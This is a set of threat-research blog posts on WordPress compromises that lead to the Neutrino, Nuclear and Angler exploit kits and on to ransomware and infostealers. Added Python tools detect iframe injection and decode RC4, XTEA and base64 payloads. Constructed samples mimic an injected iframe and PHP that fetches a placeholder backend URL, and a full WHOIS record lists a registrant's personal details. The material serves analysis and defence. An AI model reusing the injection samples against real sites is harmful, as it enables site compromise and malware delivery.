Neutrino Campaign Leveraging WordPress, Flash For CryptoWall

Neutrino Exploit Kit (EK) appeared on the scene around March of 2013 and has remained active, incorporating new exploits as they surface. In the beginning of July, Neutrino reportedly incorporated the HackingTeam 0day (CVE-2015-5119), and in the past few days we’ve seen a massive uptick in the use of the kit. The cause of this uptick appears to be widespread WordPress site compromises.
ThreatLabZ started seeing a new campaign where WordPress sites running version 4.2 and lower were compromised, and the image below illustrates the components involved in this campaign.
Fig 1. Complete Neutrino WordPress campaign
Analyzing the infection cycle reveals multiple recent changes in the Neutrino code, some of which are normally characteristic of Angler Exploit Kit, while others remain unique to Neutrino.
WordPress Compromises
Similar to Angler Exploit Kit, the new wave of Neutrino is targeting outdated versions of WordPress. In fact, in the last month we have seen over 2600 unique WordPress sites used in this campaign, with more than 4200 distinct pages logged as carrying the dynamically injected iframe. As mentioned, all the targeted websites were running WordPress version 4.2 and lower.
Fig 2. Event timeline overview
The goal of this campaign is to completely compromise the site, which includes adding a webshell, harvesting credentials, and finally injecting an iframe that loads a Neutrino landing page. The iframe is injected into the compromised site immediately after the BODY tag, and is almost identical to recent Angler samples. Compare the recent Neutrino and Angler samples below.
Fig 3. Neutrino on the left, Angler on the right
The code specifically targets Internet Explorer, so those using other browsers won’t be served the iframe, and a cookie is used to prevent serving the iframe multiple times to the same victim.
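The IE-only, cookie-gated delivery described above means that an administrator who checks the site from Chrome or Firefox, or who reloads a page already visited once, will never see the injected iframe. The following is an added example, not code from the original post, of a differential check that fetches the same page under several client identities and flags an iframe that sits directly after the BODY tag. The `serve_page` function is a constructed stand-in for the compromised site that reproduces the gating behaviour the post describes; the landing hostname, cookie name and user-agent strings in it are placeholders.

```python
import re
from typing import Callable, Dict, List, Optional, Tuple

# Constructed stand-in for a compromised WordPress site. It reproduces the
# gating described above: the iframe is only emitted for Internet Explorer
# user agents, only once per victim (tracked with a cookie), and is placed
# immediately after the opening <body> tag. The landing hostname is a placeholder.
CLEAN_PAGE = "<html><head><title>Blog</title></head><body><h1>Welcome</h1></body></html>"
INJECTED = ('<iframe src="http://landing.example/index.php" width="1" height="1" '
            'style="visibility:hidden;position:absolute"></iframe>')
GATE_COOKIE = "_visited"


def serve_page(user_agent: str, cookies: Dict[str, str]) -> Tuple[str, Optional[str]]:
    """Return (html, cookie_name_to_set) the way the backdoored site would."""
    is_ie = "MSIE" in user_agent or "Trident/" in user_agent
    if not is_ie or GATE_COOKIE in cookies:
        return CLEAN_PAGE, None
    html = re.sub(r"(<body[^>]*>)", lambda m: m.group(1) + INJECTED, CLEAN_PAGE, count=1, flags=re.I)
    return html, GATE_COOKIE


IFRAME_AFTER_BODY = re.compile(r"<body[^>]*>\s*(<iframe\b[^>]*>)", re.I)


def iframe_after_body(html: str) -> Optional[str]:
    """Return the iframe tag sitting directly after <body>, or None if there is none."""
    m = IFRAME_AFTER_BODY.search(html)
    return m.group(1) if m else None


def differential_check(fetch: Callable[[str, Dict[str, str]], Tuple[str, Optional[str]]]) -> List[str]:
    """Fetch the page as several clients and report iframes that only some of them receive.

    Every profile starts with an empty cookie jar so the one-shot gate cannot hide
    the injection; a profile that triggers it is fetched once more carrying the
    cookie the server set, to show the suppression an administrator would run into."""
    profiles = {
        "ie11": "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko",
        "ie8": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
        "firefox": "Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0",
        "chrome": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0 Safari/537.36",
    }
    findings = []
    for name, ua in profiles.items():
        html, set_cookie = fetch(ua, {})
        tag = iframe_after_body(html)
        if tag is None:
            continue
        findings.append(f"{name}: iframe directly after <body>: {tag}")
        if set_cookie is not None:
            again, _ = fetch(ua, {set_cookie: "1"})
            if iframe_after_body(again) is None:
                findings.append(f"{name}: injection suppressed on repeat visit once cookie {set_cookie!r} is present")
    return findings


if __name__ == "__main__":
    for line in differential_check(serve_page):
        print(line)
```

To run this against a live site, replace `serve_page` with a function that performs the HTTP request with the given User-Agent and cookies and returns the response body together with the name of any cookie the server tries to set; the point of the check is that each profile is fetched from a clean cookie jar, so the one-shot gate cannot mask the injection.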
The actual Neutrino landing pages are retrieved on the backend through the injected PHP code, a sample of which is below:
Fig 4. Injected PHP code
Note the base64 encoded value boxed in red above; this decodes to the URL below, where X, Y, and Z are integers:
This URL is used to retrieve an updated landing page URL, and we’ve noted that the URLs change very frequently. Additionally, the primary IP hosting the majority of landing page domains is ‘’ which is owned by We reached out to them via email briefly explaining what we were seeing and received no response.
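The backend URL in the injected PHP is hidden as a base64 literal, which is how most of these injectors stash their configuration. The following added example, not code from the original post, scans PHP source for `base64_decode()` calls with literal arguments, decodes each one and sorts it into a URL, PHP code, text or binary, so the backend host can be pulled out of a compromised install without executing anything. The sample PHP it runs on is constructed inside the block, with placeholder hostname, path and query string.

```python
import base64
import re
from typing import List, Tuple


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed sample of injected PHP, built here so the block is self-contained.
# The backend hostname, path and query string are placeholders.
BACKEND_URL_B64 = _b64("http://backend.example/get.php?x=1&y=2&z=3")
PHP_STUB_B64 = _b64('echo "hello";')
LABEL_B64 = _b64("not a url")
SAMPLE_PHP = f"""<?php
$u = base64_decode("{BACKEND_URL_B64}");
$r = @file_get_contents($u);
if (strpos($_SERVER['HTTP_USER_AGENT'], 'MSIE') !== false) echo $r;
eval(base64_decode('{PHP_STUB_B64}'));
$label = base64_decode("{LABEL_B64}");
"""

# base64_decode() with a quoted literal argument; whitespace inside the literal is tolerated
B64_CALL = re.compile(r"""base64_decode\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""")
URL_RE = re.compile(r"^https?://[^\s'\"]+$")
PHP_HINT = re.compile(r"<\?php|\b(eval|echo|system|exec|assert|file_get_contents|preg_replace|include|require)\b")


def classify(decoded: bytes) -> str:
    """Rough triage of a decoded literal: url, php, text or binary."""
    try:
        text = decoded.decode("ascii")
    except UnicodeDecodeError:
        return "binary"
    if URL_RE.match(text.strip()):
        return "url"
    if PHP_HINT.search(text):
        return "php"
    return "text"


def scan_php(source: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, category, decoded_text) for every literal base64_decode() argument."""
    results = []
    for m in B64_CALL.finditer(source):
        raw = re.sub(r"\s+", "", m.group(2))
        try:
            decoded = base64.b64decode(raw, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        line = source.count("\n", 0, m.start()) + 1
        results.append((line, classify(decoded), decoded.decode("ascii", "replace")))
    return results


if __name__ == "__main__":
    for line, category, text in scan_php(SAMPLE_PHP):
        print(f"line {line}: {category:6s} {text}")
```

In practice `scan_php` is run over the contents of every .php file under the WordPress root; hits classified as `url` are the backend hosts worth blocking, and hits classified as `php` that feed `eval()` are the webshell or injector logic itself.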
Neutrino Landing Page
The landing page has been updated and contains some JavaScript that only declares variables, followed by a Flash loader:
Fig 5. Neutrino landing page
If Flash isn’t installed on the victim machine, an old Flash CAB is pushed to the user prior to serving the malicious SWF. Note the departure from base64-encoded data blobs, and indeed from using much code at all on the landing page.
Neutrino SWF
Past versions of the Neutrino SWF contained multiple exploit payloads encrypted via RC4. Examining this SWF shows that things have apparently changed as the structure is very different:
Fig 6. SWF structure
Taking a look at the code shows that instead of RC4, there is a decode function that uses the input of one binary data blob to decode a second binary blob; the decoded data reveals a second SWF:
Fig 7. Decode function for embedded SWF
Detection results for the SWF are very poor, with only one vendor detecting it:
Fig 8. Poor detection results on SWF
Carving out the embedded SWF and analyzing it shows a much more familiar structure for Neutrino, with some additional enhancements. Notably similar is the use of multiple embedded binary blobs that are RC4 encrypted:
Fig 9. Binary data inside embedded SWF
Fig 10. Script data inside embedded SWF – characteristic of Neutrino
These binary blobs contain multiple payloads, and this has been analyzed and documented in the past, notably by Kafeine and Dennis O’Brien on Malwageddon. However, unlike past Neutrino SWFs, the RC4 keys are no longer in cleartext and decoding them requires tracing through multiple function calls. The ActionScript structure is still very recognizable though:
Fig 11. Decoder for one binarydata ‘exploitWrapper’ blob
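Carving the embedded SWF and decrypting the RC4 blobs is mechanical once the key has been traced out of the ActionScript. The following is an added example, not the post’s or the kit’s code: a textbook RC4 routine plus a small carver that scans a decrypted blob for SWF signatures (FWS uncompressed, CWS zlib-compressed, ZWS LZMA), sanity-checks the version and length fields so chance three-byte matches are discarded, and inflates CWS bodies. The blob it runs on is constructed in the block itself, and the key is a placeholder, since the real keys have to be recovered by tracing the decoder functions.

```python
import struct
import zlib
from typing import List, Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA); the same call encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def build_swf(body: bytes, version: int = 11, compress: bool = True) -> bytes:
    """Wrap an arbitrary body in a minimal SWF container (used only to construct test data)."""
    length = 8 + len(body)  # the header length field counts the *uncompressed* file
    header = struct.pack("<3sBI", b"CWS" if compress else b"FWS", version, length)
    return header + (zlib.compress(body) if compress else body)


def carve_swfs(blob: bytes) -> List[Tuple[int, str, int, bytes]]:
    """Locate SWF headers inside blob; return (offset, signature, version, uncompressed_swf).

    FWS is copied as-is, CWS is inflated with zlib, ZWS (LZMA) is reported but not
    inflated here. Version and length are sanity-checked to weed out chance
    occurrences of the three-byte signature in random-looking data."""
    found = []
    for sig in (b"FWS", b"CWS", b"ZWS"):
        start = 0
        while (off := blob.find(sig, start)) != -1:
            start = off + 1
            if off + 8 > len(blob):
                continue
            version, length = struct.unpack_from("<BI", blob, off + 3)
            if version == 0 or version > 50 or length < 8:
                continue
            if sig == b"FWS":
                if off + length <= len(blob):
                    found.append((off, "FWS", version, blob[off:off + length]))
            elif sig == b"CWS":
                try:
                    body = zlib.decompressobj().decompress(blob[off + 8:])
                except zlib.error:
                    continue
                if len(body) + 8 == length:
                    found.append((off, "CWS", version, blob[off:off + 8] + body))
            else:
                found.append((off, "ZWS", version, b""))
    return sorted(found, key=lambda f: f[0])


if __name__ == "__main__":
    # Constructed scenario: an inner SWF wrapped in padding and RC4-encrypted as one
    # blob. The key is a placeholder; real keys have to be traced out of the decoder.
    inner = build_swf(b"\x00" * 64 + b"exploitWrapper")
    key = b"placeholder-key"
    blob = rc4(key, b"\xAA" * 37 + inner + b"\x55" * 5)
    for off, sig, ver, data in carve_swfs(rc4(key, blob)):
        print(f"{sig} version {ver} at offset {off}: {len(data)} bytes uncompressed")
```

The length check is what makes the carver usable on real binaryData blobs: a CWS header whose zlib body does not inflate to exactly the advertised size is a false positive, not a SWF, and is dropped rather than handed to a decompiler.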
Detection on the embedded SWF is also quite poor.
Fig 12. Embedded SWF VT detection
Successful exploitation of a victim leads to an encrypted executable download. The binary is decrypted and begins beaconing almost immediately:
Fig 13. Initial beacon summary
Fig 14. Full beacon/response sample
Looking at the traffic, we can immediately see this is CryptoWall 3.0. Sure enough, a couple of minutes later we see the all too familiar ‘HELP_DECRYPT’ page and see connections out to the payment servers:
Fig 15. Payment server connections
Fig 16. CryptoWall 3.0 HELP_DECRYPT page
To read more about CryptoWall, please see our previous writeup here.
Campaign Information
As stated, the primary IP for the observed Neutrino landing pages is ‘’ which is owned by Many of the domains pointing to that IP use the ‘xyz’, ‘ga’, ‘gq’, and ‘ml’ TLDs. Looking at the WHOIS data for some of these domains, a common attribute is the registrant name ‘Max Vlapet’ on the .XYZ domains. A full WHOIS record for one domain follows for completeness:
Domain Name: MOHGROUP.XYZ 
Domain ID: D9543161-CNIC 
WHOIS Server: 
Referral URL: 
Updated Date: 2015-08-18T08:34:04.0Z 
Creation Date: 2015-08-18T08:34:03.0Z 
Registry Expiry Date: 2016-08-18T23:59:59.0Z 
Sponsoring Registrar: AlpNames Limited 
Sponsoring Registrar IANA ID: 1857 
Domain Status: clientTransferProhibited 
Domain Status: serverTransferProhibited 
Domain Status: addPeriod 
Registrant ID: ALP_44867689 
Registrant Name: Max Vlapet 
Registrant Organization: N/A 
Registrant Street: Mausoleum str, pl.13 
Registrant City: Moscow 
Registrant State/Province: Moscow 
Registrant Postal Code: 123006 
Registrant Country: RU 
Registrant Phone: +7.4959826524 
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext: 
Registrant Email: 
Admin ID: ALP_44867689 
Admin Name: Max Vlapet 
Admin Organization: N/A 
Admin Street: Mausoleum str, pl.13 
Admin City: Moscow 
Admin State/Province: Moscow 
Admin Postal Code: 123006 
Admin Country: RU 
Admin Phone: +7.4959826524 
Admin Phone Ext: 
Admin Fax: 
Admin Fax Ext: 
Admin Email: 
Tech ID: ALP_44867689 
Tech Name: Max Vlapet 
Tech Organization: N/A 
Tech Street: Mausoleum str, pl.13 
Tech City: Moscow 
Tech State/Province: Moscow 
Tech Postal Code: 123006 
Tech Country: RU 
Tech Phone: +7.4959826524 
Tech Phone Ext: 
Tech Fax: 
Tech Fax Ext: 
Tech Email: 
Name Server: NS2.MOHGROUP.XYZ 
Name Server: NS1.MOHGROUP.XYZ 
DNSSEC: unsigned 
Billing ID: ALP_44867689 
Billing Name: Max Vlapet 
Billing Organization: N/A 
Billing Street: Mausoleum str, pl.13 
Billing City: Moscow 
Billing State/Province: Moscow 
Billing Postal Code: 123006 
Billing Country: RU 
Billing Phone: +7.4959826524 
Billing Phone Ext: 
Billing Fax: 
Billing Fax Ext: 
Billing Email: 
>>> Last update of WHOIS database: 2015-08-19T00:44:12.0Z <<<
Unfortunately, very little information is available for the other TLDs in use. The backend IP serving new landing page URLs is registered to a company called 'VDS INSIDE' located in Ukraine. A dump of the 700+ malicious domains and/or landing pages we've collected is on pastebin:
Conclusion
WordPress, being a widely popular and free Content Management System (CMS), remains one of the most attractive targets for cyber criminals. WordPress compromises are not new, but this campaign shows an interesting underground nexus starting with backdoored WordPress sites, a Neutrino Exploit Kit-controlled server, and the highly effective CryptoWall ransomware. This campaign also reconfirms that Neutrino Exploit Kit activity is on the rise and is still a major player in the exploit kit arena. ThreatLabZ is actively monitoring this campaign and ensuring that Zscaler customers are protected.
Acknowledgement
Special thanks to Dhruval Gandhi for profiling compromised WordPress sites
Write-up by: John Mancuso, Deepen Desai

Link: https://www.zscaler.com

An Update On Nuclear (Reverse) Engineering

Although Angler continues to be the leading exploit kit, Nuclear is a significant threat to web surfers and seems to have been very active lately. ThreatLabZ recently encountered a Nuclear campaign originating from a variety of compromised sites. These compromises continue the trend of WordPress sites serving malcode, and in this case included the web presence of a UK-based healthcare organization.
Example of recent Nuclear landing page to exploit cycle
The execution flow of this campaign is typical: a compromised site includes an embedded iframe that loads the exploit kit landing page. The landing page checks the browser family and version and tests the available Flash version before choosing one of several exploit payloads. From there, one or more payloads may be downloaded; in this campaign we observed the Fareit infostealer Trojan and the Troldesh ransomware Trojan.
Nuclear Landing
As covered recently, WordPress continues to be one of the most effective traffic sources for exploit kits. However, the majority of traffic we have seen does not feature the visitorTracker component, but merely includes a hidden iframe in the footer of the WordPress page.
The malicious iframe is preceded by a large number of blank lines
The iframe loads the landing page, which features obfuscated JavaScript and random-looking text blocks. It turns out that some of the random looking text blocks are actually obfuscated components that the JavaScript eventually deobfuscates and executes.
Lines 7 and 9 are overlaid with the script invocations that decode the HTML blocks
Nuclear Exploit Payloads
The landing pages we evaluated led to two possible Flash exploits as well as one Internet Explorer exploit. Specifically, we saw CVE-2015-5122 and CVE-2015-5560 exploits for Flash, and a highly obfuscated CVE-2014-6332 exploit for IE.
The first Flash payload stage checks Flash Player version and prepares the appropriate exploit
As noted by Kafeine, Nuclear has integrated the same Diffie-Hellman key exchange that Angler first pioneered, only now it is implemented in Flash to protect the CVE-2015-5560 payload. This campaign also features an XTEA function with modified constants.
A Diffie-Hellman key exchange implementation is used to protect the new Flash payload
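The “modified constants” remark matters in practice: XTEA with an altered delta is still XTEA, but a stock decryptor produces garbage and an analyst who does not compare the round function against the published constant will chase a non-existent new cipher. The following is an added example, not the kit’s code, of XTEA with the delta exposed as a parameter, a roundtrip showing that data encrypted under a modified delta only decrypts under that delta, and a small search that tries candidate constants pulled from a decompiled round function against a known plaintext prefix. The key, the payload and the value `KIT_DELTA` are placeholders; `KIT_DELTA` is not the constant from the Nuclear sample.

```python
import struct
from typing import Optional, Sequence, Tuple

MASK = 0xFFFFFFFF
STANDARD_DELTA = 0x9E3779B9   # the published XTEA constant, floor(2**32 / golden ratio)
KIT_DELTA = 0x0BADF00D        # PLACEHOLDER for a modified constant; not the value from the kit


def _mix(v: int, s: int, k: int) -> int:
    """The XTEA round function: (((v << 4) ^ (v >> 5)) + v) ^ (sum + key[...])."""
    return (((((v << 4) & MASK) ^ (v >> 5)) + v) & MASK) ^ ((s + k) & MASK)


def xtea_encrypt_block(v0: int, v1: int, key: Sequence[int],
                       delta: int = STANDARD_DELTA, rounds: int = 32) -> Tuple[int, int]:
    s = 0
    for _ in range(rounds):
        v0 = (v0 + _mix(v1, s, key[s & 3])) & MASK
        s = (s + delta) & MASK
        v1 = (v1 + _mix(v0, s, key[(s >> 11) & 3])) & MASK
    return v0, v1


def xtea_decrypt_block(v0: int, v1: int, key: Sequence[int],
                       delta: int = STANDARD_DELTA, rounds: int = 32) -> Tuple[int, int]:
    s = (delta * rounds) & MASK
    for _ in range(rounds):
        v1 = (v1 - _mix(v0, s, key[(s >> 11) & 3])) & MASK
        s = (s - delta) & MASK
        v0 = (v0 - _mix(v1, s, key[s & 3])) & MASK
    return v0, v1


def xtea_ecb(data: bytes, key: bytes, encrypt: bool, delta: int = STANDARD_DELTA) -> bytes:
    """ECB over 8-byte blocks with big-endian words and no padding (the test-vector convention)."""
    if len(data) % 8 or len(key) != 16:
        raise ValueError("data must be a multiple of 8 bytes and the key exactly 16 bytes")
    k = struct.unpack(">4I", key)
    fn = xtea_encrypt_block if encrypt else xtea_decrypt_block
    out = bytearray()
    for i in range(0, len(data), 8):
        v0, v1 = struct.unpack(">2I", data[i:i + 8])
        out += struct.pack(">2I", *fn(v0, v1, k, delta))
    return bytes(out)


def find_delta(ct: bytes, key: bytes, candidates: Sequence[int], magic: bytes) -> Optional[int]:
    """Return the first candidate delta whose decryption of the first block starts with magic.

    With the key known from the ActionScript but the constant altered, trying the
    handful of 32-bit immediates lifted from the decompiled round function against
    a known plaintext prefix (a SWF or PE header) is usually enough to settle it."""
    for d in candidates:
        if xtea_ecb(ct[:8], key, False, delta=d).startswith(magic):
            return d
    return None


if __name__ == "__main__":
    key = bytes(range(16))                      # placeholder key
    payload = b"CWS\x0b" + b"\x00" * 12         # constructed: a SWF-like header plus padding
    ct = xtea_ecb(payload, key, True, delta=KIT_DELTA)
    print("standard delta :", xtea_ecb(ct, key, False).hex())
    print("modified delta :", xtea_ecb(ct, key, False, delta=KIT_DELTA).hex())
    print("recovered delta:", hex(find_delta(ct, key, [STANDARD_DELTA, KIT_DELTA], b"CWS") or 0))
```

The block-level functions take the key as four 32-bit words and the byte-level wrapper packs words big-endian, which is the convention of the published XTEA test vectors; a Flash implementation may well pack little-endian, so when porting a kit’s routine check the word order before concluding the constant is wrong.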
Besides making reverse engineers’ lives harder, the authors have also decided to include some friendly shoutouts to those analyzing their code. In the case of the featured Flash payloads, the string “fuckAV" is used as a special constant.
This function returns an XOR key when "fuckAV" is supplied as a parameter
Nuclear Fallout
Once the browser is exploited, Nuclear first drops a Fareit payload. Fareit is an infostealer and, as can be seen in the strings below, looks to steal user credentials for multiple applications and websites as well as Bitcoin wallet information.
A sample of the files and paths Fareit checks for user credentials
While stealing users’ information, Fareit attempts to hide its command and control communication by sending its check-in request in the midst of a batch of HTTP requests to innocuous-looking websites.
After checking connectivity on, multiple POSTs are performed
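Burying the check-in inside a burst of decoy requests is aimed at an analyst eyeballing a capture, but in proxy logs the burst itself is the signal: one client, a connectivity GET, then several POSTs to unrelated hosts within a few seconds. The following is an added example, not from the original post, of that detection logic run over constructed proxy log lines; the client addresses, hostnames, window size and host-count threshold are placeholders chosen for illustration, not indicators from the campaign.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple


class Req(NamedTuple):
    ts: datetime
    client: str
    method: str
    host: str
    path: str


# Constructed proxy log in the form "timestamp client method host path status".
# Client addresses and hostnames are placeholders, not indicators from the post.
SAMPLE_LOG = """\
2015-10-05T14:03:00Z 10.0.0.7 GET connectivity-check.example / 200
2015-10-05T14:03:01Z 10.0.0.7 POST news-site.example /index.php 200
2015-10-05T14:03:01Z 10.0.0.7 POST shop.example /cart 200
2015-10-05T14:03:02Z 10.0.0.7 POST weather.example /api 404
2015-10-05T14:03:02Z 10.0.0.7 POST 203.0.113.9 /gate.php 200
2015-10-05T14:03:03Z 10.0.0.7 POST forum.example /login 200
2015-10-05T14:10:00Z 10.0.0.7 GET intranet.example / 200
2015-10-05T14:03:05Z 10.0.0.8 POST mail.example /send 200
2015-10-05T14:04:40Z 10.0.0.8 POST mail.example /send 200
"""

BARE_IP = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def parse(log: str) -> List[Req]:
    reqs = []
    for line in log.splitlines():
        ts, client, method, host, path, _status = line.split()
        reqs.append(Req(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, method, host, path))
    return reqs


def find_post_bursts(reqs: List[Req], window: timedelta = timedelta(seconds=5),
                     min_hosts: int = 3) -> Dict[str, dict]:
    """Flag clients that POST to at least min_hosts distinct hosts inside one window.

    A normal browsing session rarely POSTs to several unrelated sites within a few
    seconds; a check-in padded with decoy requests does exactly that. The alert
    also records whether a GET (the connectivity check) immediately preceded the
    burst and which burst hosts are bare IP addresses, usually the odd one out."""
    by_client: Dict[str, List[Req]] = defaultdict(list)
    for r in reqs:
        by_client[r.client].append(r)
    alerts: Dict[str, dict] = {}
    for client, rs in by_client.items():
        rs.sort(key=lambda r: r.ts)
        posts = [r for r in rs if r.method == "POST"]
        for i, start in enumerate(posts):
            burst = [p for p in posts[i:] if p.ts - start.ts <= window]
            hosts = sorted({p.host for p in burst})
            if len(hosts) < min_hosts:
                continue
            preceded = any(r.method == "GET" and timedelta(0) <= start.ts - r.ts <= window for r in rs)
            alerts[client] = {
                "start": start.ts,
                "hosts": hosts,
                "ip_hosts": [h for h in hosts if BARE_IP.match(h)],
                "preceded_by_get": preceded,
            }
            break
    return alerts


if __name__ == "__main__":
    for client, info in find_post_bursts(parse(SAMPLE_LOG)).items():
        print(client, info)
```

The threshold and window are tuned per environment; the useful triage output is the burst host list, where the real check-in is usually the host that is a bare IP, carries an odd path, or returns a body while the decoys do not.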
In addition to the Fareit payload, a Troldesh ransomware payload was also seen. Troldesh is yet another in the line of ransomware families that encrypt user files and attempt to extort a ransom payment in exchange for the decryption keys. This campaign is using the email addresses files100005(at) and files100006(at) and the Tor address a4yhexpmth2ldj3v.onion.
Troldesh bundles a Tor proxy to protect its communication
Although they might prefer to infect the machines of non-analysts, the Troldesh author does take the opportunity to greet their reverse engineer friends. This message is less aggressive than the greeting in the Nuclear flash payload.
Thanks, but I don’t drink coffee!
While Nuclear may not be the exploit kit that regularly debuts the latest advances, the authors certainly make an effort to keep up with new exploits and new obfuscation techniques. ThreatLabZ will continue to monitor Nuclear (and Fareit and Troldesh) for any new developments or greetings.
Recent landing page IP addresses
Recent landing page hostnames
Recent compromised sites and redirectors

Link: https://www.zscaler.com

Chinese Government Website Compromised, Leads To Angler

Despite a recent takedown targeting the Angler Exploit Kit (EK), it’s back to business as usual for kit operators. On 30-October-2015, ThreatLabZ noticed a compromised Chinese government website that led to the Angler Exploit Kit with an end payload of CryptoWall 3.0. This compromise does not appear targeted, and the compromised site was cleaned up within 24 hours. We have noticed some recent changes to Angler, as well as the inclusion of newer Flash exploits. A set of indicators for this compromise is at the end of this post.
Compromised Site
The “Chuxiong Archives” website, www.cxda[.], was compromised with injected code. The site has a similar look and feel to both the Chuxiong Yi Prefecture and Chuxiong City websites and appears somewhat inactive, but surprisingly the site was remediated in less than 24 hours. The full infection cycle from compromised site to encrypted payload is shown in the Fiddler session below.
Fig 1. Infection cycle
The injected code was before the opening HTML tag and was heavily obfuscated. The code, shown below, is very similar to other recent compromises we’ve observed and was present on every page of the site, suggesting a complete site compromise.
Fig 2. Injected script
Consistent with other recent examples, the injected code appears to target Internet Explorer (IE): Firefox and Chrome consistently throw errors when attempting to execute the code and no redirection occurs. IE, however, executes the code without issue, and it unsurprisingly decodes to an iframe leading to an Angler EK landing page:
Fig 3. Decoded injected code
While we did not have access to the server-side code, it likely retrieves landing page URLs from a remote server since we observed iframes leading to multiple different Angler domains within a brief period of time.
Landing Page
The landing page for Angler is immediately recognizable, but with some notable recent changes. For example, instead of using a long block of roughly seven-character strings inside ‘div’ tags, the newer landing pages use ‘li’ tags and most of the strings are only about two characters long. Additionally, there’s a conspicuous ‘triggerApi’ function toward the top of the main script block:
Fig 4: Short strings and triggerApi function
Outside of these changes, the functionality of the landing page appears unchanged, and the goal is naturally to serve up a malicious SWF:
Fig 5. Decoded landing page SWF objects
Malicious SWF – CVE-2015-7645
Kafeine already broke the news that Angler is exploiting Flash CVE-2015-7645, and we can corroborate that with the samples we’ve observed.
Fig 6. Flash being exploited
In fact, we compared the sample from his recent post with one obtained from this infection and the structure is identical, with very few changes in the ActionScript. The biggest change we saw was in the embedded binary data.
Fig 7. SWF structure, 30-Oct sample on the left, Kafeine’s sample on the right
Fig 8. Comparison of binary data, 30-Oct sample on the left, Kafeine’s sample on the right
Upon a successful exploit cycle, a new CryptoWall 3.0 variant from the crypt13 campaign is downloaded and installed on the target machine. The image below shows a decrypted Command & Control (C&C) message from the CryptoWall variant, which also contains the total number of files encrypted on the target system:
Fig 9. CryptoWall 3.0 C&C message reporting encrypted file count
Final Thoughts
As stated, this seems to be business as usual for Angler EK operators. While these attacks were not targeted in nature, this is the first instance in which we have seen EK operators leverage a government site to reach end users. One interesting observation is that we no longer see a Diffie-Hellman POST exchange protecting the session against replay of captured traffic for offline analysis. Additionally, there was a much larger number of C&C servers than we have previously observed, and some of the domain names suggest multi-use hosts (e.g., spam, bitcoin mining, etc.). Note that none of the C&C servers are pseudo-randomly generated domains. ThreatLabZ will continue to track new developments with the Angler Exploit Kit.
Indicators of Compromise
Indicator categories (values not reproduced here):
IP Address: Chinese government site (1)
Angler Domain (2)
Payment Server (4)
C&C connections (57)

Link: https://www.zscaler.com

Trojan Intercepts SMS Messages To Attack Banks In South Korea

Banks in South Korea recently started to offer customers a text messaging option to access accounts and authenticate transactions. It was reported that a major South Korean bank, KEB Hana Bank, was the first to launch the text banking service in the country on Nov 21, 2016. Unfortunately, cyber thieves have picked up on this, ...
The post Trojan Intercepts SMS Messages To Attack Banks In South Korea appeared first on Trustlook Blog.